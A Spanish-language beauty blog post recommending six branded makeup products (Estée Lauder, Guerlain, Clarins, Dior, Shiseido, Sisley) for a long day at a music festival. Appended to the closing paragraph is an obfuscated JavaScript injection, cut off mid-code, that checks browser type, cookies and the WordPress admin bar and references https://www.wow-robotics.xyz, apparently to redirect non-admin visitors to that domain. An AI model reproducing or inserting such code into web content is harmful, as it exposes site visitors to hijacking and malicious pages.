Más allá de los viajes, las playas y las terrazas, el verano es la temporada de los festivales. Por eso, vamos a daros nuestros mejores consejos para un maquillaje de festival cool, más duradero y utilizando solo 6 productos. Cuando vamos a un festival con nuestros amigos queremos disfrutar de la música que más nos gusta, bailar sin parar y rodearnos del mejor ambiente, para todo esto necesitamos un look cómodo, sencillo, que llame la atención y que no necesite demasiados retoques. ¿Es posible? Deja que te lo contemos.

dos amigas soplan serpentina en direccion a la camara estan en un festival de musica y la foto tiene colores tipicos de la fotografia analogica

Los básicos de maquillaje para un festival que no pueden faltar en tu neceser.

La ropa y neceser que llevemos a un festival debe caber en una mochila, es decir, debemos pensarlo bien y con antelación para no caer en los temidos “por si acaso”.  En cuanto al neceser, si tenemos en cuenta la de horas que vamos a estar escuchando música entre la multitud tanto por el día como por la noche, el primer producto que deberemos echar será una base de maquillaje ligera con protector solar y que hidrate bien como Double Wear Water Fresh Spf 30 de ESTÉE LAUDER que refresca la piel y deja un efecto natural con una duración de hasta 24 horas para no pensar en otra cosa que adivinar cuál será la siguiente canción que sonará.

Cuando la tarde avanza y nuestro look necesita un retoque rápido no hay aliado más práctico que el Stick Iluminador de Terracotta Skin de Guerlain que, además, resiste muy bien la humedad y los cambios de temperatura. Cumple tan bien su propósito que más de una acudirá a ti desesperada para hacer un follow up de su look.

Por otro lado, el truco para que los efectos de las horas de baile y un sueño poco reparador no sean el centro de atención está en potenciar al máximo la mirada con un rímel de confianza como la Máscara Supra Volumen de Clarins que, gracias a la flor de espinillo blanco, consigue un espectacular aumento del volumen de las pestañas y si creéis que estamos exagerando: hacer la prueba y contarnos.

primer plano de la mitad de la cara de una chica joven que se esta echando rimel negro en sus frondosas pestañas

Los infalibles para un maquillaje de festival radiante, rápido y sencillo.

En el apartado anterior os dimos los básicos de maquillaje para sobrevivir un festival con un look sencillo, pero eficaz. Y, ahora, os contaremos cómo realzar en unos sencillos pasos vuestro make up de festival para que no pase desapercibido. Para adornar la mirada elegiremos colores naturales y en tonos tierra – muy al estilo Coachella- como los que ofrece la paleta 5 COULEURS WILD EARTH-EDICIÓN LIMITADA de DIOR que se fusiona muy bien con la piel y tiene una duración increíble. Hay productos que merecen la pena incluirlos entre nuestros imprescindibles y este, creer lo que os decimos, es uno de ellos.

Otro producto con una textura muy ligera, que ocupa poco espacio y consigue un efecto WOW aplicando una mínima cantidad es el colorete Minimalist Whippedpowder Blush de Shiseido, del que ya os habló nuestra maquilladora profesional Lucía Puebla en su video tutorial Cómo conseguir un maquillaje glow perfecto. El bálsamo labial con color Phyto Lip Twist de Sisley es otro must del que no te separarás una vez lo pruebes. Con él conseguirás en un solo gesto el color de un labial con un acabado muy jugoso, propio de un gloss, que también funciona muy bien como tratamiento hidratante y protector.

una c

Como habéis podido comprobar con 3 básicos de maquillaje podemos conseguir un look de festival ligero y natural. Pero si añadimos solo 3 productos más, vamos a darle ese toque exótico que tan bien combina con el ritmo de nuestras canciones favoritas. ¡Nos vemos muy pronto! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone